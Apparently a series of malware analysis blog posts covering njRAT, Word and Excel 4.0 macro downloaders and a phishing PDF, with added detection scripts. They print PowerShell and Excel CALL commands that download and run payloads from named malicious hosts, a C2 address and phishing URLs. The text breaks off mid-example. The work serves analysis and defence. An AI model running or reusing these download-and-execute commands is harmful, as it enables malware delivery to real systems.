njRAT Malware Analysis

MD5 hash: 88e085572a182ca102676676ec0ef802

File Type: Win32 executable

Signature: Microsoft Visual C# v7.0 / Basic .NET

Link to Download Sample: Any.Run

Type: Remote Access Trojan

njRAT is a remote access Trojan and one of the most widely available RATs. I came across this sample while going through Any.Run trends and downloaded it for analysis.

PE file information

I disassembled the executable with dnSpy, which makes the code easy to analyse. The stub shows the entry point, where I can set a breakpoint and start debugging to analyse the behaviour.

.NET runtime version: v2.0.50727

I start debugging and set a breakpoint at the entry point.

Entry Point

The Ko() function first checks whether any process from a predefined list is running on the victim's machine; if one is, the malware stops executing. In this case Wireshark was running in the background, so the assembly stopped and the process exited.

To avoid the call to CsAntiProcess, which looks for those running processes, I manually changed the anti_CH bool variable to false (variable values can be changed from the Locals window).

The CsAntiProcess handler looks for the processes and, if any of them is present, stops execution.

Class CsAntiProcess

The processes checked:

SN  Process             Process name / description
1   procexp             Process Explorer (Sysinternals tool)
2   SbieCtrl            SbieCtrl.exe (Sandboxie)
3   SpyTheSpy           Spyware monitoring tool
4   wireshak            Wireshark
5   apateDNS            ApateDNS tool
6   IPBlocker           IPBlocker
7   Tiger-Firewall
8   smsniff
9   exeinfoPE           Exeinfo PE tool
10  NetSnifferCS
11  SandBoxie Control
12  processhacker       Process Hacker
13  dnSpy               .NET disassembler (I am using it for debugging here)
14  CodeReflector
15  ILSpy               .NET disassembler
16  VGAuthService       VMware Guest Authentication Service
17  VBoxService         VirtualBox service

This table lists the processes the malware checks for on execution.

NOTE: To bypass the process check I also renamed the processes, e.g. Wireshark.exe to wk.exe and procexp.exe to prex.exe, which bypassed the check when I executed the malware outside dnSpy, because the process names are hard-coded.
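The hard-coded process list is also a cheap static indicator. The following Python script, an added example and not part of this post or of the sample, searches a .NET binary for the names above encoded as UTF-16LE (how .NET stores string literals in the #US heap), so a member of this family can be spotted before any debugging. The #US-heap fixture it runs on by default is constructed for the example, and the cut-off of five names for a verdict is an assumption.

```python
import re

# Process names checked by the sample's CsAntiProcess routine, as listed above.
ANTI_ANALYSIS_PROCESSES = [
    "procexp", "SbieCtrl", "SpyTheSpy", "wireshak", "apateDNS", "IPBlocker",
    "Tiger-Firewall", "smsniff", "exeinfoPE", "NetSnifferCS", "SandBoxie Control",
    "processhacker", "dnSpy", "CodeReflector", "ILSpy", "VGAuthService", "VBoxService",
]


def find_anti_analysis_strings(data, names=ANTI_ANALYSIS_PROCESSES):
    """Return {name: [offset, ...]} for every name present as a UTF-16LE literal.

    .NET string literals are stored in the #US heap as UTF-16LE, so an ASCII
    'strings' pass does not see them; searching for the UTF-16LE encoding does.
    Matching is case-insensitive so casing differences between builds still hit.
    """
    hits = {}
    for name in names:
        pattern = re.compile(re.escape(name.encode("utf-16-le")), re.IGNORECASE)
        offsets = [m.start() for m in pattern.finditer(data)]
        if offsets:
            hits[name] = offsets
    return hits


def looks_like_njrat_anti_process(hits, threshold=5):
    """Heuristic verdict: several of these tool names together is the njRAT list;
    one or two alone could be a legitimate program that merely mentions a tool."""
    return len(hits) >= threshold


def _us_heap_entry(text):
    """Build one #US heap entry: length byte, UTF-16LE chars, trailing flag byte.
    (Enough for a fixture; real heaps use compressed-integer lengths.)"""
    encoded = text.encode("utf-16-le")
    return bytes([len(encoded) + 1]) + encoded + b"\x00"


# Constructed fixture, not bytes from the real sample: a fake #US heap with
# five names from the list plus one benign string.
SAMPLE_BINARY = b"\x00" * 16 + b"".join(
    _us_heap_entry(s) for s in
    ["procexp", "wireshak", "dnSpy", "ILSpy", "VBoxService", "notepad"]
) + b"\x00" * 16


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BINARY
    found = find_anti_analysis_strings(data)
    for name, offsets in found.items():
        print(f"{name:20s} at {', '.join(hex(o) for o in offsets)}")
    print("njRAT-style anti-analysis list:", looks_like_njrat_anti_process(found))
```

Run it as `python anti_process_scan.py sample.exe` to scan a real file. The point of the UTF-16LE search is that `strings` with its default ASCII mode would report none of these names from a .NET assembly; `strings -el` or this script is needed.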

Proceeding with the debugging, it drops an executable svchost.exe at

C:\Users\<user profile>\AppData\Roaming\svchost.exe

Code that drops the executable file.

EXE is a string variable initialized to "svchost.exe". The name is presumably chosen to mimic the legitimate Windows Service Host, which makes the dropped file hard to recognise as malicious without checking its location and properties: the real svchost.exe lives in C:\Windows\System32, so a copy under a user profile is a red flag.

Captured in Process Monitor: the file is written at this location.

It also drops Tools.exe at C:\

File dropped at C:\

A third copy is dropped at

C:\Users\<user profile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e84128b2e0547d1dd1f8090d86c80c48

and a value is added under the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Name: e84128b2e0547d1dd1f8090d86c80c48

Value data: "C:\Users\IEUser\AppData\Roaming\svchost.exe" ..

With this registry value the executable runs every time the user logs on; the copy in the Startup folder achieves the same.

"Dropping" here means the malware copies itself to three locations: the three files have different names but the same hash and code.
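A check a responder would want from the persistence above: given the HKCU Run values and the contents of the Startup folder, flag entries that borrow a Windows system binary name outside C:\Windows, live in a user-writable directory, or carry a hash-like name. This Python script is an added example, not code from the post; the Run entries it evaluates are a constructed fixture built from the value above plus two ordinary-looking ones, and the list of borrowed system names is an assumption.

```python
import ntpath
import re

# Names a malicious autorun commonly borrows from Windows itself (assumed list).
SYSTEM_BINARY_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe",
                       "winlogon.exe", "services.exe"}
# Directories a standard user can write to; a real service host never lives here.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "c:\\programdata\\", "c:\\users\\public\\")
HEX32 = re.compile(r"^[0-9a-f]{32}(\.exe)?$", re.IGNORECASE)


def image_path_from_command(command):
    """Pull the executable path out of a Run-key command line (quoted or bare)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ", 1)[0]


def assess_path(name, path):
    """Return the list of red flags for one autorun entry (empty list = nothing odd)."""
    low = (path.lower().replace("%windir%", "c:\\windows")
           .replace("%systemroot%", "c:\\windows"))
    base = ntpath.basename(low)
    findings = []
    if base in SYSTEM_BINARY_NAMES and not low.startswith("c:\\windows\\"):
        findings.append("system binary name outside the Windows directory")
    if any(marker in low for marker in USER_WRITABLE_MARKERS):
        findings.append("binary in a user-writable location")
    if HEX32.match(name) or HEX32.match(base):
        findings.append("hash-like name")
    return findings


def assess_autorun(name, command):
    """Assess a Run value: name is the value name, command its data."""
    return assess_path(name, image_path_from_command(command))


def suspicious_entries(entries):
    """Assess every (name, command) pair; keep only those with findings."""
    report = {}
    for name, command in entries.items():
        findings = assess_autorun(name, command)
        if findings:
            report[name] = findings
    return report


def assess_startup_folder(paths):
    """Startup-folder files are assessed the same way, with the file name as entry name."""
    report = {}
    for path in paths:
        findings = assess_path(ntpath.basename(path), path)
        if findings:
            report[path] = findings
    return report


# Constructed fixture: the page's Run value plus two benign-looking entries.
RUN_ENTRIES = {
    "e84128b2e0547d1dd1f8090d86c80c48": '"C:\\Users\\IEUser\\AppData\\Roaming\\svchost.exe" ..',
    "SecurityHealth": "%windir%\\system32\\SecurityHealthSystray.exe",
    "OneDrive": '"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
}
STARTUP_FILES = [
    "C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
    "\\e84128b2e0547d1dd1f8090d86c80c48.exe",
]


if __name__ == "__main__":
    for name, findings in suspicious_entries(RUN_ENTRIES).items():
        print(f"Run\\{name}: {'; '.join(findings)}")
    for path, findings in assess_startup_folder(STARTUP_FILES).items():
        print(f"Startup: {path}: {'; '.join(findings)}")
```

An AppData hit alone is not a verdict (OneDrive legitimately lives there), which is why the result is a list of reasons rather than a boolean; escalate when the AppData flag is paired with a borrowed system name or a hash-like name, or after a signature check. On a live host the Run values come from `Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run`.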

In the code, the C2 IP address, the port 7777 and the executable names are initialized.

C2 Server IP Address details:

  • VT Score: 1/79
  • Status: Malicious
VirusTotal Score for C2 server IP address – Link

svchost.exe sent a TCP segment with the SYN flag to the C2 server, but there was no response from the server, even though the IP address exists and geolocates to Russia.

I used netstat to check the TCP connection.

Netstat command >> netstat -a

1) Command >> netstat -a -b   2) The process svchost.exe sent the TCP segment

Summary:

  • On execution, the malicious executable checks the running processes on the system.
  • If any of the processes listed in the table above is running, the malware stops executing.
  • It copies itself to three locations:
    • C:\Tools.exe
    • C:\Users\<user profile>\AppData\Roaming\svchost.exe
    • C:\Users\<user profile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e84128b2e0547d1dd1f8090d86c80c48.exe
  • Creates a Run registry entry so that the dropped executable runs every time the user logs on.
  • The command and control server is 85. 26. 235. 163, port 7777.
  • svchost.exe tried to connect to the C2 server; the server did not respond.
  • Accessing the C2 server IP on port 7777 in a browser returns 200 OK with empty response headers.

Thank you.

Comments and suggestions are welcome.

Word Macro Malware Analysis

SHA256: dd81d70fa14f0e95b8cd2fe86a9a21a264cbb4bb32d80c4195fc13ee6791b994

Sample Link: Beta.VirusBay.io

File Type: Microsoft Word

File Extension: .doc

VirusTotal Score 29/61

I am going to use oletools to analyse this Word document sample. For initial document analysis I rely on this toolkit; if you have read my earlier posts on Word macro analysis, you will have seen it used there.

>>oleid.py <word document file>

Word document properties

>>olevba.py -a <word document file>

VBA macro analysis

VBA macro analysis:

  • The macro executes on document open.
  • It may open/write binary files on the system.
  • It contains hex strings.
  • It contains base64-obfuscated strings.

I could decode the base64 strings with olevba:

>>olevba.py --decode <word document file>

but I would rather open the VBA editor and debug the VBA code.

To view macros navigate to View >> Macros >> View Macros

Macro windows

There is no macro available to step into because the VBA project is password protected.

Open VBA developer tool by pressing Alt+F11

To remove the password I use code written by ndthanh; the link to the code is on GitHub.

To use it, right-click on the Project >> Insert >> Module, which opens an empty code window; paste the code there.

Click Run >> (macro name) unprotected

and the password is removed and the project unlocked.

Document_Open() runs when the Word document is opened.

The VBA project contains forms and modules.

Forms

  • pfoi23hj
  • roihwo23

Macro Modules

  • ajbhk3h43
  • bcsjw
  • bklern4jh
CommandButton1() is executed automatically.

I set a breakpoint and stepped through the modules to obtain the list of URLs it tries to connect to.

The URLs are stored as base64-obfuscated strings:

  • aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n
  • aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=
  • aHR0cDovLzEweDQ1LmNvbS96ZmJqdnZxeGt0eC84ODg4ODg4LnBuZw==
  • aHR0cDovL2lhbXBsb3llZC5ubC9sYmJpdWpkeWp5Lzg4ODg4ODgucG5n
  • aHR0cDovL2FwdG9jaXVkYWRhbXVyYWxsYWRhY2FydGFnZW5hLmNvbS9nZGRxZXovODg4ODg4OC5wbmc=
  • aHR0cDovL2F1dG9lc2NvbGFjaWdhbm9zLmNvbS5ici9nZXp6Zi84ODg4ODg4LnBuZw==

After base64 decoding (each with its VT score link):

http://salwadm . com/tcphx/8888888.png   VT Score
http://flipkenya . com/nujazbwrhjy/8888888.png   VT Score
http://10x45 . com/zfbjvvqxktx/8888888.png   VT Score
http://iamployed . nl/lbbiujdyjy/8888888.png   VT Score
http://aptociudadamuralladacartagena . com/gddqez/8888888.png   VT Score
http://autoescolaciganos . com . br/gezzf/8888888.png   VT Score

The code also drops a batch file tmp.bat and executes it to create the directory tmpdir under C:\Users\Public\.

Location C:\Users\Public, where the batch file is dropped.

Next, the code deobfuscates a string by replacing each letter with the preceding letter, e.g. 'Q' becomes 'P'.

PowerShell command

Below is the PowerShell command with its obfuscated strings:

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')

With the two base64 strings decoded and the string concatenation resolved, the command is equivalent to:

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://salwadm . com/tcphx/8888888.png', 'C:\Users\Public\tmpdir\file1.exe')"

The PowerShell command downloads the file from the URL to file1.exe. Taking a closer look at the downloaded file, it is an HTML page with an .exe extension.
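The decoding steps above (the base64 URL list, the letter-shift substitution, and the DownloadFile call whose arguments are rebuilt at run time) as one Python helper. This is an added example rather than the macro's or the post's code; it uses the base64 strings listed above and the PowerShell expression from the command, while the shift decoder's wrap-around for 'a' and its sample input "QpxfsTifmm" are assumptions made for illustration.

```python
import base64
import re

# Base64 strings recovered from the macro (the list above).
ENCODED_URLS = [
    "aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n",
    "aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=",
    "aHR0cDovLzEweDQ1LmNvbS96ZmJqdnZxeGt0eC84ODg4ODg4LnBuZw==",
    "aHR0cDovL2lhbXBsb3llZC5ubC9sYmJpdWpkeWp5Lzg4ODg4ODgucG5n",
    "aHR0cDovL2FwdG9jaXVkYWRhbXVyYWxsYWRhY2FydGFnZW5hLmNvbS9nZGRxZXovODg4ODg4OC5wbmc=",
    "aHR0cDovL2F1dG9lc2NvbGFjaWdhbm9zLmNvbS5ici9nZXp6Zi84ODg4ODg4LnBuZw==",
]

# The PowerShell expression from the macro (outer 'powershell -Command' wrapper dropped).
PS_COMMAND = (
    "(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString("
    "[System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), "
    "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    "'QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')"
)

B64_CALL = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
LITERAL = re.compile(r"'([^']*)'")


def decode_b64(s):
    return base64.b64decode(s).decode("ascii")


def shift_decode(s):
    """Undo the macro's letter substitution: each letter becomes the preceding one
    ('Q' -> 'P'). Wrapping 'a' -> 'z' and leaving non-letters alone are assumptions."""
    out = []
    for ch in s:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") - 1) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") - 1) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def resolve_download(command):
    """Return (url, destination) for a DownloadFile call that hides both arguments
    behind FromBase64String and completes the file name by string concatenation."""
    b64_matches = list(B64_CALL.finditer(command))
    url = decode_b64(b64_matches[0].group(1))
    destination = decode_b64(b64_matches[1].group(1))
    # Literals appended after the second decode ('1' + '.e' + 'x' + 'e') finish the name.
    tail = command[b64_matches[-1].end():]
    destination += "".join(LITERAL.findall(tail))
    return url, destination


def decoded_urls():
    return [decode_b64(s) for s in ENCODED_URLS]


if __name__ == "__main__":
    for url in decoded_urls():
        print(url)
    print(resolve_download(PS_COMMAND))
    print(shift_decode("QpxfsTifmm"))  # constructed sample of the letter shift
```

The fallback URLs only differ in host and path, so the same `resolve_download` applies to whichever one the macro picks; re-run it with each base64 string substituted into the command if you need the full set of URL/destination pairs.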

File downloaded by PowerShell script

I uploaded this file to VirusTotal and there were zero detections.

SHA256: 3b11440abf602e0ac35a8a1489ed26ec0103ed2ba636520761c698e5fb2df9d1

VirusTotal score link here

Summary:

  • On opening the document, the forms execute.
  • Drops a batch file which creates a folder on the victim's machine.
  • Executes a PowerShell command which downloads a file from one of several URLs.
  • Looks for antivirus and real-time protection values in the registry.

Word Macro Malware Analysis

Hash: 98fe0b166f550446cbf9e0f368eb8bea79d2eec29fa033cee1ff8f8e38a12836

Sample Download Source: beta.virusbay.io

File Type: Microsoft Word Document

File Format: .doc

VirusTotal Score: 32/62

Document Preview:


File Property:

cmd> olemeta.py <filename>

Document Macro Analysis:

cmd> olevba.py -a <filename>

Document_Open macro executes on opening document.


The first thing I tried was to access the macro. By default macros were disabled; to enable them go to File > Options > Trust Center > Trust Center Settings > Macro Settings, select Enable all macros and tick Trust access to the VBA project object model. (Only do this in an isolated analysis VM: with this setting any document will run its macros unprompted.)


After enabling macros, I navigate to View > Macros > View Macros.

There are macros in the document.

I tried to step into the Document_Open macro, which executes on document open, but got an error: the project is locked and not viewable.

To make it viewable, I downloaded the tool EvilClippy. It creates a new copy of the Word document in the same directory as the current document.

When I open the document with the project now viewable, open the VBA editor with Alt+F11 and try to open the macro code, I get a Project Password prompt.

To remove/bypass this password there is a VBA routine (GitHub link).

I create a new module, paste this code there and run the macro unprotected.

Debugging Macro

I started debugging the macro code and found that the code below runs a PowerShell command.

The PowerShell command is written to C:\Users\<profile>\AppData\Roaming\Temp\

PowerShell command that executes via command line.

powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p

PowerShell fetches the three URLs below with BITS and saves them as vido.com, sfera and rTTj.com in C:\Users\<user>\AppData\Local\Temp. It then runs certutil -decode on sfera (so sfera is base64 text) to produce po15p, and starts vido.com with po15p as its argument; vido.com is the executable actually run and the decoded sfera is its input.

I tried to debug the PowerShell script, but the URLs are no longer accessible. Sadly, I couldn't download the files this script would have fetched.
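The command line above has several properties a detection engineer can key on independently of the URL: an Office process launching PowerShell, a hidden window combined with Start-BitsTransfer, certutil -decode, and Start-Process on a file staged in %TEMP%. The Python below is an added example, not from the post, that runs those four rules over a handful of constructed process-creation events in Sysmon Event ID 1 style (the first event reproduces the command shown above; the rest are benign look-alikes made up for the test). The rule logic and the field names are my assumptions about the telemetry format.

```python
import ntpath
import re

# Constructed process-creation events in Sysmon Event ID 1 style (not real telemetry).
EVENTS = [
    {
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            'powershell -windowstyle hidden -command Import-Module BitsTransfer; '
            'Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat '
            '-Destination "$env:TEMP\\vido.com"; Set-Location -Path "$env:TEMP"; '
            'certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p'
        ),
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NoProfile -Command Get-Process",
    },
    {
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": "certutil -decode sfera po15p",
    },
    {
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\certutil.exe",
        "CommandLine": "certutil -verify server.cer",
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _base(path):
    return ntpath.basename(path).lower()


def office_spawns_shell(ev):
    return _base(ev["ParentImage"]) in OFFICE_APPS and _base(ev["Image"]) in SHELLS


def hidden_bits_download(ev):
    cmd = ev["CommandLine"]
    return (re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.IGNORECASE) is not None
            and re.search(r"Start-BitsTransfer", cmd, re.IGNORECASE) is not None)


def certutil_decode(ev):
    # certutil -decode turns base64 text into a binary; rare in legitimate endpoint use.
    return re.search(r"certutil(?:\.exe)?\s+(?:-|/)decode\b",
                     ev["CommandLine"], re.IGNORECASE) is not None


def executes_from_temp(ev):
    cmd = ev["CommandLine"]
    staged_in_temp = "$env:TEMP" in cmd or "%TEMP%" in cmd.upper()
    return staged_in_temp and re.search(r"Start-Process\s+\S+", cmd, re.IGNORECASE) is not None


RULES = {
    "office_spawns_shell": office_spawns_shell,
    "hidden_bits_download": hidden_bits_download,
    "certutil_decode": certutil_decode,
    "executes_from_temp": executes_from_temp,
}


def evaluate(ev):
    """Names of the rules one event matches, in rule order."""
    return [name for name, rule in RULES.items() if rule(ev)]


def scan(events):
    """Return {event index: matched rule names} for every event that matched anything."""
    result = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for i, hits in scan(EVENTS).items():
        print(f"event {i}: {', '.join(hits)}")
```

Each rule is weak on its own (certutil -decode fires on the bare certutil event too), so score events by how many rules they match: the macro's command line trips all four, while an admin's PowerShell session trips none.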

http://neoneo-bg.site/hIeak.dat

VirusTotal Score: 5/71

http://neoneo-bg.site/geTask.dat

VirusTotal Score: 7/71

http://neoneo-bg.site/rTTj.dat

VirusTotal Score: 5/71

Summary:

  • On opening the document, the Word macro executes a PowerShell command.
  • The PowerShell command downloads files to the Temp folder, decodes one with certutil and runs the result.

Thank you. Please post comments for suggestions.

Excel 4.0 macro Trojan Downloader – Malware Analysis

Hash: 89e62ec08b0b6065134c67937bae76ccd70163770fd6992574e41b9c82c3cf1c

Sample Download Link: beta.VirusBay.io

Application Name: Microsoft Excel

File Type: xls

VirusTotal Score: 29/60


I came across this sample on VirusBay.io and downloaded the malicious Excel file to my VM for analysis.

olevba.py

First I analysed the macro source in the Excel file using oletools:

Command > olevba.py -a <filename>

The result shows the macro auto-executes on opening the file, may run an executable (probably via a shell command) and downloads a file from a remote server. The executable name is FBpKzqF.exe.

Document Property:

The file uses an XLM (Excel 4.0) macro sheet, which is hidden.

Steps To Make Macros Sheet Visible

Step 1

I unhid it by right-clicking a sheet tab in Excel and selecting Unhide…

A popup then shows the name of the hidden sheet to unhide. Here the sheet is named SODXOFScMLy.

Step 2

Along with this, the Excel file needs to be unblocked: right-click the file > Properties > General tab > tick Unblock. I ran olevba again to check the macro's visibility status and it now reported visible.

While going through the spreadsheet, I searched for the keywords I had found in the macro extracted with olevba.

The olevba output shows the string value C:\ProgramData\FBpKzqF.exe

So I searched the spreadsheet for .exe, sure I would find something, and found the URL http:// gstat.dondyablo .com/ fattura.exe; at this point fattura.exe was just an HTML page (VirusTotal link here).

Checking this URL on VirusTotal shows it is up and malicious, scoring 17/79.

I also ran an nslookup for the domain. Three IPs are assigned to it: the first two in Russia and the third in the Netherlands.

Next I looked for formulas and CALL functions in the columns, as I had seen them in the macro extracted by olevba.py (screenshot below).

I started with a CALL function: right-click and run it.

Click on Step in.

Clicking Evaluate evaluates the values of the CALL's parameters.

Post evaluation:

=CALL($BZ$118,$HT$592, "JJCCJJ",0,$BB$54,$GI$1025,0,0)

Here the values are

$BZ$118 = "URLMON"

$HT$559 = "URLDownloadToAFile"

$BB$54 = "http:// gstat.dondyablo .com/ fattura.exe"

$GI$1024 = "C:\ProgramData\FBpKzqF.exe"

In Excel 4.0's CALL the type text "JJCCJJ" describes the signature: the first character is the return type and the rest are the argument types, with J a 32-bit integer and C a null-terminated string. So this is int f(int, char*, char*, int, int), which matches URLDownloadToFile(pCaller, szURL, szFileName, dwReserved, lpfnCB). With the references resolved:

=CALL("URLMON","URLDownloadToAFile","JJCCJJ",0,
"http:// gstat.dondyablo .com/ fattura.exe",
"C:\ProgramData\FBpKzqF.exe",0,0)

There is another CALL function; I evaluate it to get its values.

=CALL($H$24,$GD$694, "JJCCCCJ",0,$I$1161,$GI$1025,,0,0)

$H$24 = "Shell32"

$GD$694 = "ShellExecuteA"

$I$1161 = "open"

$GI$1025 = "C:\ProgramData\FBpKzqF.exe"

Here "JJCCCCJ" is int f(int, char*, char*, char*, char*, int), i.e. ShellExecuteA(hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd); the empty argument is a NULL lpParameters. With the references resolved:

=CALL("Shell32","ShellExecuteA","JJCCCCJ",0,
"open","C:\ProgramData\FBpKzqF.exe",,0,0)

Looking at these two CALL functions:

  • The first downloads the executable from the URL.
  • The second executes it on the victim's machine.
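Resolving CALL formulas by hand, as done above for two cells, can be scripted once the sheet's cell values are dumped. The Python below is an added example (not the post's own code): it substitutes cell references in the two formulas from a constructed cell map built from the values evaluated above, decodes the CALL type string into a C-style signature, checks that the number of arguments matches the type string, and summarises each call. Cell addresses follow the formulas as shown above; the type-code table covers only the codes used here plus a few common ones.

```python
import re

# Cell values as evaluated above (constructed map; addresses follow the two formulas).
CELLS = {
    "$BZ$118": "URLMON",
    "$HT$592": "URLDownloadToAFile",
    "$BB$54": "http://gstat.dondyablo.com/fattura.exe",
    "$GI$1025": "C:\\ProgramData\\FBpKzqF.exe",
    "$H$24": "Shell32",
    "$GD$694": "ShellExecuteA",
    "$I$1161": "open",
}

FORMULAS = [
    '=CALL($BZ$118,$HT$592, "JJCCJJ",0,$BB$54,$GI$1025,0,0)',
    '=CALL($H$24,$GD$694, "JJCCCCJ",0,$I$1161,$GI$1025,,0,0)',
]

# Excel 4.0 REGISTER/CALL type codes (subset): the first character is the return type.
TYPE_CODES = {"J": "int32", "C": "char*", "A": "bool", "B": "double", "D": "byte-counted string"}


def _resolve_arg(token, cells):
    token = token.strip()
    if token == "":
        return None                      # empty argument, the ',,' in the formula
    if token.startswith('"') and token.endswith('"'):
        return token[1:-1]
    if token.startswith("$"):
        return cells[token]              # KeyError means the cell was not dumped
    return int(token)


def resolve_call(formula, cells):
    """Turn =CALL(dll, func, types, args...) with cell references into concrete values.
    Assumes no commas inside quoted strings (true for the formulas above)."""
    m = re.fullmatch(r"\s*=CALL\((.*)\)\s*", formula)
    if not m:
        raise ValueError("not a CALL formula")
    parts = [_resolve_arg(p, cells) for p in m.group(1).split(",")]
    dll, func, types, *args = parts
    return {"dll": dll, "function": func, "types": types, "args": args}


def describe_signature(types):
    """Split a CALL type string into (return type, [argument types])."""
    names = [TYPE_CODES.get(c, "?" + c) for c in types]
    return names[0], names[1:]


def arity_matches(call):
    """True when the type string declares exactly as many arguments as were passed."""
    return len(describe_signature(call["types"])[1]) == len(call["args"])


def summarize(call):
    """One-line intent, keyed on the API name and its string arguments."""
    strings = [a for a in call["args"] if isinstance(a, str)]
    name = call["function"].lower()
    if "urldownload" in name:
        return f"download {strings[0]} -> {strings[1]}"
    if "shellexecute" in name:
        return f"{call['function']} {strings[0]} {strings[1]}"
    return f"{call['dll']}!{call['function']}({', '.join(map(str, call['args']))})"


if __name__ == "__main__":
    for f in FORMULAS:
        call = resolve_call(f, CELLS)
        ret, args = describe_signature(call["types"])
        print(f"{call['dll']}!{call['function']} -> {ret} f({', '.join(args)}) "
              f"arity ok={arity_matches(call)} :: {summarize(call)}")
```

The arity check is worth keeping: a type string that does not fit the argument list is either a transcription error on the analyst's side or a formula that Excel would reject, and both are good to know before trusting the decoded call.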

Next I test it: I enable Internet on my VM and run the first CALL function (instead of stepping in), which downloads the executable.

Network Log:

The network log shows a connection to IP address 195. 22. 152. 76, which resolves to gstat. dondyablo .com

The image below shows it downloaded an MS-DOS application.

The URL is served by Apache on an Ubuntu host.

Process Explorer:

Process Explorer captured the TCP connection to the remote IP; the executable is downloaded to two locations:

  • C:\ProgramData\FBpKzqF.exe
  • C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\fattura[1].exe (IE cache; URLDownloadToFile fetches through the WinINet cache)

Downloaded Executable File Information

File name: FBpKzqF.exe

File Type: Win32 EXE

Hash: cddf3cc072913f9e5b0a020b12a0d80184b34a82f6ea6f8f7e95475a87de268c

VirusTotal Score: 50/70


Summary

  • The Excel file contains an Excel 4.0 macro in a hidden sheet (SODXOFScMLy).
  • The macro's CALL functions download and run the executable FBpKzqF.exe.
  • The executable is downloaded from "http:// gstat.dondyablo .com/ fattura.exe".
  • The downloaded executable is a trojan.

PDF malware analysis

Hash: d26a7e67cda125f11270af0a820f6644cf920ed70fd5b166e82757dabb6d1ee0

Download sample link: Here

File type: PDF

VirusTotal score: 27/54


PDF Document Preview


PDFiD

I used PDFiD to triage the PDF; it reports 24 occurrences of /URI in the file.

The next step is to extract the URLs from the document. I use two tools for this: pdf-parser and PDFStreamDumper.

pdf-parser

I use pdf-parser, a Python script, to extract just the URLs from this document; I navigate to the pdf-parser folder and run:

pdf-parser.py -k /URI <.pdf file>

These are the 5 URLs extracted from the PDF document:

(http://www.diamondcreationslb . com/doc/rdd.htm)
(http://ruseuropharm . ru/tobi/index.php)
(http://tcil-bd . com/tin-count/zigi/index.php)
(http://tcil-bd . com/wp-includes/IXR/alen/index.php)
(http://tcil-bd . com/dfp/index.php)

PDFStreamDumper

PDFStreamDumper is a very handy GUI tool. It loads all objects in the PDF file and shows them in text or hex form. Opening the malicious PDF in PDFStreamDumper, I can see the URLs under the objects. To get all the URLs I have to go through the objects in the left panel one by one.

E.g. (screenshot)
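pdf-parser -k /URI and PDFStreamDumper show the targets, but a small extractor makes the counting reproducible and catches URIs written as hex strings, which a plain text search for "http" misses. The following Python is an added example, not part of the post; the PDF fragment it parses is constructed for the test (three of the URLs above, one repeated, one as a hex string) and is not the analysed sample. It also reports the raw /URI keyword count the way PDFiD does, which shows why that number can exceed the number of distinct links.

```python
import re
from collections import Counter

# Constructed minimal PDF fragment (not the analysed sample): four link annotations,
# one URL repeated and one written as a hex string.
SAMPLE_PDF = b"""%PDF-1.4
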